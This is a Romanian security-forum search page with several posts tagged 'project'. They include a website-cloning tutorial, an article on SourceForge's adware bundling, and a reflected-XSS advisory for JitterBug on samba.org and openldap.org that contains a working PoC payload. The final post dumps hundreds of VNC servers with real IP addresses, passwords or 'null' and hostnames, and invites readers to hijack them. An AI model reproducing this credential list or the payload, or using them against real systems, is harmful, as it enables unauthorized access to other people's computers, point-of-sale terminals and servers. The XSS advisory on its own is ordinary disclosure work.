Jump to content

Search the Community

Showing results for tags 'project'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 15 results

  1. Salutare,dupa ceva timp am decis sa fac un tutorial despre cum putem sa copiem un website pana in cele mai mici detalii. Pasul 1: Vom incepe prin descarcarea programului necesar clonarii oricarui site web. HTTrack este un program dezvoltat de o echipa de francezi si din fericire pentru noi este distribuit gratuit. Intram pe HTTrack.com si accesam sectiunea Downloads de unde descarcam cea mai noua versiune. Pasul 2: Vom cauta site-ul pe care dorim sa il clonam. Deoarece in urma cu cateva zile am spus intr-un video de pe YouTube ca voi clona un site web apartinand cavaleria.ro ( este doar un exemplu pur demonstrativ) il voi clona pe acela, asa ca adresa mea tinta va fi Cavaleria.RO Pasul 3: Dupa ce am descarcat programul mentionat la pasul anterior, il instalam dupa metoda clasica "Next > I accept > Next > ... > Finish" Pasul 4: Deschidem programul si observam ca suntem intampinati de o fereastra de inceput. Apasam Next. Pasul 5: Vedem ca apar 3 casute: Project name, Project category, Base path Project name - il completam cu un nume oarecare, eu am completat cu "clonarecavaleria" Project category - il completam cu un nume oarecare, eu am completat cu "p_clonarecavaleria" Base path - locul unde dorim sa se salveze clona website-ului Pasul 6: Completam campul Web Adresses cu pagina web ce dorim sa o clonam. Pasul 7: Apasam pe Next dupa care pe Finish si asteptam ca programul sa isi faca treaba (in functie de complexitatea site-ului, clonarea s-ar putea sa dureze.. bine-nteles, depinde si de viteza conexiunii dvs. la internet) Pasul 8: Dupa ce site-ul a fost downloadat (eu cand am ales bluepanel-ul, am oprit operatia de clonare dupa 2-3 minute deoarece downloada fiecare profil al fiecarui jucator, si ar fii durat cateva ore bune) Pasul 9: Intram in C:\My Web Sites sau locatia precizata de dvs la pasul 5 si deschidem folderul denumit precum Project name-ul vostru. Pasul 10: Intram in folderul cavaleria.ro (folderul denumit precum URL-ul site-ului clonat) si putem deschide si observa ca fisierul index.html (precum toate celalalte fisiere) este identic cu cel al site-ului original. Observatii si precizari: Acesta a fost un tutorial pur demonstrativ Acest program este incapabil sa copieze si codul PHP al siteului (adica efectiv partea de script - functionalitatea site-ului) Acest program este foarte util daca doriti sa copiati aspectul unui site, copiaza pana in cele mai mici detalii. Tutorialul este creat de mine,a mai fost postat pe blogul meu! Daca nu intelegi ceva, lasati in comentariu si o sa va raspund. Multumesc pentru timpul acordat!
  2. Heya! Deci, vreau sa ma apuc de un proiect mai serios care sa ma tina ocupat macar doua saptamani. Ideea e ca vreau ca acest proiect sa ma scoata din sfera de begginer/intermediate in care sunt. Vreau ca, prin intermediul acest proiect, sa invat. Deci vreau, astfel, ca faza de inceput sa fie usoara, si cu cat dezvolt mai mult, sa devina din ce in ce mai greu. Voi programa in C++, consola. Probabil, cu timpul voi face si o interfata grafica, asta dupa ce voi dezvolta proiectul atat pentru Linux cat si pentru Windows. Temporar, vreau ca totul sa se desfasoare in stadiul de consola. Lucruri pe care vreau sa ma axez in acest proiect: -programare orientata pe obiecte -Standard Template Library Probabil si Test Driven-Development, am mai avut o incercare, dar nu a iesit prea frumos... E cam greu la inceput. Limbaj de programare: C++ Sistem de operare: Linux Manjaro Daca e, si nu are nimeni nimic impotriva, o sa fac un repository pe GitHub si voi cere sfaturi in continuare in acest topic (sau in altul, daca e mai ok asa). Asadar, ce idei de proiecte aveti si imi puteti oferi? Multumesc si imi cer scuze pentru postul plictisitor!
  3. Se da aplicatia Garena Plus. (Garena - The Official Site) Se poate recompila aceasta aplicatie astfel incat sa fie tinuta de un alt server? Daca da, let me know.
  4. The takeover of the SourceForge account for the Windows version of the open-source GIMP image editing tool reported by Ars last week is hardly the first case of the once-pioneering software repository attempting to cash in on open-source projects that have gone inactive or have actually attempted to shut down their SourceForge accounts. Over the past few years, SourceForge (launched by VA Linux Systems in 1999 and now owned by the tech job site company previously known as Dice) has made it a business practice to turn abandoned or inactive projects into platforms for distribution of "bundle-ware" installers. Despite promises to avoid deceptive advertisements that trick site visitors into downloading unwanted software and malware onto their computers, these malicious ads are legion on projects that have been taken over by SourceForge's anonymous editorial staff. SourceForge's search engine ranking for these projects often makes the site the first link provided to people seeking downloads for code on Google and Bing search results. And because of SourceForge's policies, it's nearly impossible for open-source projects to get their code removed from the site. SourceForge is, in essence, the Hotel California of code repositories: you can check your project out any time you want, but you can never leave. Finders, keepers As Ars reported, SourceForge posted a statement on the service's blog last week contending that GIMP had abandoned their project, and the site's team had merely picked up the account to maintain it under their "mirror" program for open source and free software projects. But the company did admit that it wrapped the GIMP installer on its site with a Web installer offering commercial software packages to get revenue out of the downloads. For some developers who post code to SourceForge, the adware offering bundles around downloads are welcome. In 2013, the FileZilla project's lead developer Tim Kosse authorized SourceForge to put an offer-producing installer around the project's download file. When someone expressed concern about the adware installer in the FileZilla forum, Kosse replied, "This is intentional. The installer does not install any spyware and clearly offers you a choice whether to install the offered software." He added that an unbundled installer was still available on FileZilla's official download page. FileZilla was an early participant in DevShare, SourceForge's revenue sharing plan for open-source developers. It was supposed to be opt-in only. By allowing SourceForge to wrap downloads in a Web installer that offered up to three different software bundles, open-source projects could generate some cash to support development. But GIMP never enrolled in DevShare—SourceForge foisted the adware on the project's Windows installer after taking over the project's page. On Sunday, the GIMP team issued an official statement through Michael Schumacher, a maintainer of the GIMP website. It said that the GIMP team was never informed of what SourceForge was going to do. "This was done without our knowledge and permission, and we would never have permitted it," Schumacher wrote. Furthermore, he noted, the move broke a promise SourceForge made in November 2013: "We want to reassure you that we will never bundle offers with any project without the developers consent." Schumacher said that "SourceForge are abusing the trust that we and our users had put into their service in the past. We don't believe that this is a fixable situation. Even if they promise to adhere to the set of guidelines outlined below, these promises are likely to become worthless with any upcoming management change at SourceForge. However, if SourceForge's current management are willing to collaborate with us on these matters, then there might be a reduction in the damage and feeling of betrayal among the Free and Open Source Software communities." One way to fix things, Schumacher said, would be for SourceForge to "provide a method for any project to cease hosting at any SourceForge site if desired, including the ability to: completely remove the project and URLs permanently, and not allow any other projects to take its place; remove any hosted files from the service, and not maintain mirrors, serving installers or files differing from those provided by the project or wrap those in any way; [and] provide permanent HTTP redirects (301) to any other location as desired by the project. This is not unreasonable to expect from a service that purports to support the free software community." However, SourceForge's current policy makes pulling a project from the site almost impossible: A little something extra GIMP left SourceForge in part because of what Schumacher called "the invasion of the big green 'Download' button ads." Those ads, which SourceForge promised to make an effort to block from download pages, appear on nearly every one of the downloads for "mirrored" open-source projects either established or taken over by SourceForge's staff. SourceForge isn't alone in hosting these deceptive advertisements that try to fool site visitors into downloading something a little extra. CNET's Downloads.com and other download-focused sites also mirror popular open-source and free software to generate advertising revenue and promote software bundles, and they often include ads with "Download" buttons that are totally unrelated to the software the visitor is seeking. And while many legitimate applications are offered through accompanying downloads on those sites, the ads often deliver software that is of questionable value at best—and malware at worst. But those other sites don't have the same open-source heritage that SourceForge's name carries. Launched in 1999 by the company then known as VA Research (and shortly after as VA Linux Systems), SourceForge was the original open community development platform. The software behind SourceForge became an enterprise product as well. By 2007, even the Department of Defense had embraced it to set up the original Forge.mil at the Defense Information Systems Agency—a way for the military's developers to create military development communities around shared projects, even classified ones. The enterprise version of SourceForge was sold off to CollabNet in April of 2007. And as competition rose from other source code repositories—chiefly from GitHub, which by January of 2013 had more than five million project repositories—many projects began to abandon SourceForge. The service's character seemed to shift after its sale by Geeknet (along with Slashdot and Freecode) to Dice Holdings for $20 million in September 2012, and that company instead focused on the retail site ThinkGeek. (Update: Geeknet is on track to be acquired by GameStop, after Gamestop outbid Hot Topic. This story originally reported the proposed acquisition by Hot Topic from last week.) The GIMP-Windows project is still active on SourceForge, and it is still packaged with the bundle-offer installer. Update: SourceForge now says that it will discontinue this practice for all "abandoned" projects, and only offer the advertisement-loaded installer as an opt-in for active project developers. Source
  5. NOTE: The source code of this project has been released into the public domain and is made available at github.com/decomp. This paper was written for the Final Year Engineering Project at Portsmouth University during the academic session 2014 - 2015. Poster The following poster summarises the project outcomes. It was created for a student project conference which was held at Portsmouth University on the 18th of March 2015. Link: https://github.com/mewpaper/decompilation
  6. ###################################################################### # Exploit Title: Samba.org and OpenLDAP.org Reflected XSS # Date: 02/04/2015 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.samba.org & www.openldap.org # Version: / # Category: Reflected Cross Site Scripting # Google dork: # Tested on: Samba.org and OpenLDAP.org main domains ###################################################################### Samba description : ====================================================================== Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell. Samba provides file and print services for various Windows clients and can integrate with a Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Windows NT domains. www.samba.org is the main domain of the project. OpenLDAP description : ====================================================================== OpenLDAP is a free, open source implementation of the Lightweight Directory Access Protocol (LDAP) developed by the OpenLDAP Project. It is released under its own BSD-style license called the OpenLDAP Public License. www.openldap.org is the main domain of the project. JitterBug project description : ====================================================================== JitterBug is a web based bug tracking system. It was originally developed by the Andrew Tridgell to handle bug tracking, problem reports and queries from Samba users. It is now available under the GNU General Public License in the hope that it will be useful for other projects. JitterBug operates by receiving bug reports via email or a web form. Authenticated users can then reply to the message, move it between different categories or add notes to it. In some ways JitterBug is like a communal web based email system. This web page is itself a JitterBug page. You can get an idea of what JitterBug can do by playing with the various links and buttons. JitterBug was used by many others open-source projects like Gnome, rsync, The Gimp, linux-patches, ProFTPD, Willows, Java Linux, WindowMaker, mod_ssl, GnuCash or OpenLdap. Only OpenLDAP and Samba use it currently, so they are both impacted by the vulnerability describes here. RXSS Vulnerability description - PoC : ====================================================================== A reflected XSS is available in the JitterBug bug tracking project provided on the samba.org and openldap.org websites. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Samba/OpenLDAP portals, or capture Samba's (OpenLDAP) users credentials such cookies. It's also possible to forge a fake page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "id" variable and is not properly sanitized before being used to his page. Tested on Firefox 35.0. PoC: http://www.samba.org/cgi-bin/jitterbug/CVS?id=1337</TITLE><img src=x onerror="alert(/Reflected XSS - Yann CAM @asafety/)" /><TITLE>;selectid=1337 JitterBug future : ====================================================================== As indicated by Samba : The JitterBug project is no longer being actively maintained. Jitterbug has known unfixed security vulnerabilities. Unless you know exactly what you are doing, you should not use it any more. If you wish to take over as the maintainer then please contact Andrew Tridgell at [email]jitterbug@tridgell.net[/email] A possible patch is to sanitize each call of the jitterbug.c file : void print_title(char *fmt, ...) Which injects GET vars directly in HTML source generated : print_title('%s - %s/%s', lp_title(), directory, cgi_variable('id')); In the cgi.c file, there is a potential function to escape all dangerous chars : char *urlquote(char *s) Screenshots : ====================================================================== - [url]http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_001.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_002.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_001.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_002.png[/url] Solution: ====================================================================== Fixed by OpenLDAP team (no details) JitterBug is no longer maintained on Samba website. Thanks to both team, Samba and OpenLDAP, for their kindness and responsiveness. Additional resources : ====================================================================== - [url]https://www.samba.org/jitterbug/[/url] - [url]http://www.openldap.org/its/index.cgi/Web?id=7988[/url] - [url]https://bugzilla.samba.org/show_bug.cgi?id=10967[/url] - [url]http://www.asafety.fr/vuln-exploit-poc/contribution-reflected-xss-vulnerabilites-dans-samba-org-et-openldap-org[/url] - [url]http://www.synetis.com[/url] Report timeline : ====================================================================== 2014-11-26 : Samba ticket created to alert team with details and PoC. 2014-11-26 : OpenLDAP ticket created to alert team with details and PoC. 2014-11-26 : OpenLDAP fix the vulnerability. 2014-11-27 : Samba response with additional questions. 2015-03-30 : New comment to get a status 2015-03-30 : JitterBug on Samba.org website is disabled and the project is no more longer maintained. 2015-04-02 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 [url]www.synetis.com[/url] 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: [url]www.synetis.com[/url] | [url]www.asafety.fr[/url] Source
  7. Sunt vreo 500 la numar, cred ca gasiti ceva bun p'acolo. Am sa va mai postez, cel putin odata pe saptamana. Hai sariti sa va puneti redirecturile ca stiu ca asta faceti . Ma-ti terorizat cu ele, cum le vad cum le sterg... . 2.109.240.90:5900-null-[None] 112.216.248.234:5900-1-[qq4ero7hd8sv6] 177.21.110.10:5900-1234-[None] 177.21.52.62:5900-123456-[cameras ( 192.168.13.1 ) - application mode] 112.7.121.152:5900-1-[pc-201304141208] 112.16.76.193:5900-null-[installer@installer-desktop] 112.16.93.13:5900-null-[1570020POS99] 112.2.50.149:5900-password-[110301188-01] 112.2.12.21:5900-password-[110301188-01] 112.2.50.170:5900-password-[110301188-01] 112.2.55.194:5900-password-[110301188-01] 112.2.50.188:5900-password-[110301188-01] 112.2.49.27:5900-password-[110301188-01] 121.34.251.19:5900-null-[None] 121.34.124.66:5900-1-[2014_2015jthssm] 121.44.114.7:5900-1-[None] 121.67.212.16:5900-null-[None] 121.67.212.27:5900-null-[None] 121.67.212.76:5900-null-[None] 121.67.212.70:5900-null-[None] 121.67.212.11:5900-null-[None] 121.67.212.12:5900-null-[None] 121.67.212.71:5900-null-[None] 121.67.212.77:5900-null-[None] 121.67.212.73:5900-null-[None] 121.67.212.72:5900-null-[None] 121.67.212.42:5900-null-[None] 121.67.212.30:5900-null-[None] 121.67.212.23:5900-null-[None] 121.67.212.17:5900-null-[None] 121.67.212.13:5900-null-[None] 121.67.212.22:5900-null-[None] 121.67.212.15:5900-null-[None] 121.67.212.54:5900-null-[None] 121.67.212.41:5900-null-[None] 121.67.212.40:5900-null-[None] 121.67.212.69:5900-null-[None] 121.67.212.28:5900-null-[None] 121.67.212.47:5900-null-[None] 121.67.212.53:5900-null-[None] 121.67.212.32:5900-null-[None] 121.67.212.37:5900-null-[None] 121.67.212.26:5900-null-[None] 121.66.39.21:5900-null-[None] 121.67.212.55:5900-null-[None] 121.67.212.57:5900-null-[None] 121.67.212.62:5900-null-[None] 121.67.212.79:5900-null-[None] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.7.3.19:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 121.66.38.203:5900-1234-[nvr28:0] 121.12.167.104:5900-123456-[OTHER] 121.53.51.134:5900-123456-[mvodtown:0] 121.67.62.28:5900-12345678-[None] 121.67.62.25:5900-12345678-[None] 121.67.62.14:5900-12345678-[pc014] 121.67.62.24:5900-12345678-[None] 121.67.62.18:5900-12345678-[None] 121.67.62.22:5900-12345678-[None] 211.2.26.47:5900-passwd-[yuichi-macmini] 121.67.212.35:5900-null-[None] 110.5.17.67:5900-null-[oruser@ubuntu12-04] 110.20.229.51:5900-null-[BJE-CP1:0.0] 110.10.133.206:5900-null-[None] 110.10.133.204:5900-null-[None] 110.10.133.191:5900-null-[None] 110.10.133.133:5900-null-[None] 110.10.133.135:5900-null-[None] 110.10.133.134:5900-null-[None] 110.6.191.205:5900-admin123-[2012-20110101gg ( 110.6.191.205, 172.22.169.1, 169.254.131.242 )] 110.15.211.98:5900-0000-[pm06 ( 110.15.211.98 ) - application mode] 110.10.133.202:5900-null-[None] 110.10.133.176:5900-null-[None] 154.127.117.82:5900-1-[None] 117.172.163.200:5900-123-[PC-201204091653] 123.242.169.245:5900-123-[i01068] 123.242.156.6:5900-123456-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)] 121.1.254.150:5900-null-[192.168.0.190 ] 52.16.163.163:5900-null-[None] 52.16.142.254:5900-null-[nobody's x11 desktop (linerishana:1)] 52.16.170.223:5900-null-[amazona-c323d46] 52.1.226.14:5900-null-[None] 52.10.10.17:5900-null-[None] 24.13.243.196:5900-null-[exercise] 24.15.192.124:5900-null-[art@Ubu] 24.4.40.162:5900-1-[David’s iMac] 24.9.52.142:5900-null-[user@user-Dimension-4550] 81.7.10.87:5900-null-[QEMU (vmcentos7)] 81.7.122.3:5900-null-[www - VirtualBox] 81.9.153.58:5900-null-[x11] 81.12.145.216:5900-null-[D42L7H3J] 81.10.106.106:5900-null-[PACSSHOBAN] 24.9.167.171:5900-null-[None] 81.24.131.251:5900-null-[Qt for Embedded Linux VNC Server] 81.30.158.229:5900-null-[x11] 81.33.27.109:5900-null-[Device 10001] 81.33.102.60:5900-null-[Device 10001] 81.35.177.104:5900-null-[QEMU] 81.36.24.96:5900-null-[QEMU] 81.29.252.196:5900-1-[alborz-ics ( 10.51.222.171, 10.60.4.235, 81.29.252.196, 192.168.231.10 ) - service mode] 81.44.43.134:5900-null-[OEM-MAMTWY7H6GU] 81.52.169.18:5900-null-[SERVERTEC] 81.65.55.235:5900-null-[KVM-SERVEUR] 81.82.77.131:5900-null-[None] 81.33.25.134:5900-null-[None] 81.83.6.135:5900-null-[x11] 81.57.207.3:5900-null-[skyangeli@vDebian] 81.84.120.41:5900-null-[root's x11 desktop (VVServer:0)] 81.89.12.66:5900-null-[QEMU (instance-00000043)] 81.102.83.136:5900-null-[donald@ubuntu] 81.109.37.232:5900-null-[OEM-OASBVV2TX75] 81.133.6.182:5900-null-[hulk:0] 81.133.219.45:5900-null-[None] 81.134.14.139:5900-null-[TP] 81.135.94.240:5900-null-[root's x11 desktop (ExzaRaspberry:1)] 81.136.246.106:5900-null-[E1101] 81.138.38.34:5900-null-[R6_01:0] 81.138.38.45:5900-null-[R5_01:0] 81.133.113.92:5900-null-[None] 81.138.237.173:5900-null-[DPFTP] 81.140.69.34:5900-null-[IGEL-00E0C5101D25:0] 81.155.232.251:5900-null-[Cinema] 81.164.56.75:5900-null-[WindowsCE] 81.149.198.21:5900-null-[clarks@clarks-PowerEdge-T300] 81.149.200.232:5900-null-[attainserver@attainserver-M68MT-S2] 81.170.151.207:5900-null-[None] 81.170.189.171:5900-null-[None] 81.151.50.143:5900-null-[henryg@zoom-mint1] 81.169.245.238:5900-null-[QEMU (fw)] 81.170.252.54:5900-null-[None] 81.170.178.57:5900-null-[None] 81.174.49.178:5900-null-[perla:0.0] 81.173.145.34:5900-null-[martin@ubuntu-buddah] 81.169.209.226:5900-null-[None] 81.175.160.82:5900-null-[x11] 81.175.147.175:5900-null-[QEMU (ubuntu-dev)] 81.175.165.92:5900-null-[x11] 81.153.21.181:5900-null-[None] 81.158.180.254:5900-null-[None] 81.174.15.163:5900-null-[desknow@00-DESKNOW] 81.183.193.131:5900-null-[x11] 81.183.216.30:5900-null-[Win XP Prof ALU] 81.170.69.64:5900-null-[plex@plex] 81.186.253.166:5900-null-[None] 81.184.220.147:5900-null-[VNC server via dispmanx] 81.184.247.54:5900-null-[marcoslinux:0] 81.174.37.50:5900-1-[None] 81.193.145.161:5900-null-[root's x11 desktop (VVServer:0)] 81.190.144.40:5900-1-[kasa ( 192.168.1.101 ) - service mode] 81.187.202.12:5900-null-[PADPLOTTER3] 81.196.109.68:5900-null-[QEMU (virt_admin)] 81.192.114.67:5900-null-[root@localhost.localdomain] 81.198.121.165:5900-null-[None] 81.201.57.152:5900-null-[None] 81.180.115.84:5900-null-[None] 81.206.168.44:5900-1-[x0vncserver] 81.209.111.52:5900-null-[x11] 81.209.112.165:5900-null-[x11] 81.210.113.130:5900-null-[None] 81.214.131.128:5900-null-[CATI] 81.218.162.69:5900-null-[Touch3G ] 81.198.84.242:5900-null-[administrator@administrator] 81.218.133.159:5900-null-[None] 81.215.200.69:5900-1-[FOREX] 81.222.88.198:5900-null-[QEMU (instance-000000c9)] 81.224.45.141:5900-null-[None] 81.219.27.68:5900-1-[supermarket ( 192.168.1.3 ) - service mode] 81.224.115.90:5900-null-[None] 81.225.48.235:5900-null-[None] 81.224.98.167:5900-null-[None] 81.225.19.126:5900-null-[None] 81.226.48.241:5900-null-[None] 81.227.16.231:5900-null-[None] 81.227.11.133:5900-null-[None] 81.227.35.212:5900-null-[None] 81.227.35.132:5900-null-[None] 81.224.135.60:5900-null-[None] 81.227.19.175:5900-null-[None] 81.227.36.131:5900-null-[None] 81.227.25.75:5900-null-[None] 81.196.98.235:5900-null-[None] 81.228.39.216:5900-null-[iX T10A] 81.229.48.225:5900-null-[None] 81.228.198.158:5900-null-[None] 81.231.164.234:5900-null-[E1070] 81.231.250.98:5900-null-[None] 81.231.104.217:5900-null-[None] 81.231.238.149:5900-null-[None] 81.232.19.148:5900-null-[E1070] 81.233.67.172:5900-null-[None] 81.233.152.54:5900-null-[None] 81.233.185.249:5900-null-[None] 81.233.178.19:5900-null-[None] 81.234.21.221:5900-null-[None] 81.233.255.165:5900-null-[E1032] 81.234.151.82:5900-null-[None] 81.235.131.41:5900-null-[None] 81.234.151.231:5900-null-[E1101] 81.235.206.92:5900-null-[None] 81.236.20.208:5900-null-[None] 81.236.210.216:5900-null-[None] 81.236.223.2:5900-null-[E1071] 81.236.217.233:5900-null-[None] 81.236.223.47:5900-null-[E1071] 81.205.181.92:5900-null-[None] 81.236.212.182:5900-null-[monlserv1:0] 81.217.199.131:5900-null-[None] 81.246.0.10:5900-null-[None] 81.248.75.21:5900-null-[None] 81.248.249.227:5900-null-[pop@201107455] 81.47.172.253:5900-12-[NCIS] 81.88.233.130:5900-12-[None] 81.171.155.42:5900-null-[QEMU (oVirtm)] 81.227.46.52:5900-null-[None] 81.236.254.106:5900-null-[None] 81.237.238.231:5900-null-[None] 81.10.2.210:5900-123-[None] 81.10.2.212:5900-123-[None] 81.22.204.192:5900-123-[WPRTA0040022] 81.59.2.90:5900-123-[x0vncserver] 81.137.245.179:5900-123-[None] 81.195.75.60:5900-123-[avto@avto] 81.237.222.113:5900-null-[None] 24.20.196.118:5900-1234-[your-92c71f85fb] 81.9.132.21:5900-1234-[iService Gestión] 81.15.224.218:5900-1234-[None] 81.43.98.123:5900-1234-[Adhoc MiniServer] 81.45.86.124:5900-1234-[server-tau ( 172.26.0.151 ) - service mode] 81.56.234.183:5900-1234-[EXTER T100] 81.56.198.245:5900-1234-[T12B] 81.57.125.74:5900-1234-[NOM-63E6AC54477] 81.88.239.5:5900-1234-[x0vncserver] 81.88.252.60:5900-1234-[x0vncserver] 81.88.252.120:5900-1234-[x0vncserver] 81.110.54.58:5900-1234-[Bryan’s Mac mini] 81.136.131.200:5900-1234-[ht5 ( 192.168.1.9 ) - service mode] 81.136.222.63:5900-1234-[E1061] 81.137.217.146:5900-1234-[kensington ( 192.168.1.98 ) - service mode] 81.139.177.145:5900-1234-[OSX-XSERVE-01] 81.174.3.2:5900-1234-[WinVNC] 81.174.140.197:5900-1234-[server ( 192.168.59.10 )] 81.149.231.78:5900-1234-[None] 81.182.75.133:5900-1234-[WLGHUN10-BPHUB3] 